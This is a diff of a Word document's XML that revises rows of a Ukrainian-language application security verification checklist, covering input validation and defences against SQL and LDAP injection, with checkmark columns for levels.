                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся, що єдиний орган управління перевірки вхідних даних використовується додатком для </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>кожного</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> типу да</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>них, як</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ий є дозволеним</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17066,14 +18991,9 @@
             </w:pPr>
           </w:p>
         </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="1529"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17101,24 +19021,15 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+                <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>4.4</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17157,43 +19068,15 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся, що єдиний орган управління перевірки вхідних даних використовується додатком для кожного типу да</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>них, як</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ий є дозволеним</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="630" w:type="dxa"/>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17221,14 +19104,196 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="540" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.5</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:tabs>
+                <w:tab w:val="left" w:pos="708"/>
+                <w:tab w:val="left" w:pos="1416"/>
+              </w:tabs>
+              <w:spacing w:line="360" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся в тому, що всі запити </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>SQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>HQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>OSQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>NoSQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> і </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">збережені </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">процедури, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>виклик цих</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> процедур захищені з використанням підготовлених операторів або параметризації запитів, і, таким чином, не сприйнятливих до </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>SQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ін'єкції</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17256,14 +19321,62 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17291,16 +19404,24 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>4.6</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -17328,7 +19449,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+                <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -17337,40 +19458,53 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>4.5</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:tabs>
-                <w:tab w:val="left" w:pos="708"/>
-                <w:tab w:val="left" w:pos="1416"/>
-              </w:tabs>
-              <w:spacing w:line="360" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що всі запити </w:t>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>тому</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, що програма не сприйнятливий до </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -17380,17 +19514,47 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>SQL</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
+              <w:t>LDAP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ін'єкцій, а</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>бо що контроль безпеки запобі</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>гає</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -17400,83 +19564,99 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>HQL</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>OSQL</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>NoSQL</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> і процедури, що вимагають збережених процедур захищені з використанням підготовлених операторів або параметризації запитів, і, таким чином, не сприйнятливих до </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>SQL</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> ін'єкції</w:t>
+              <w:t>LDAP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ін'єкці</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ї</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="630" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
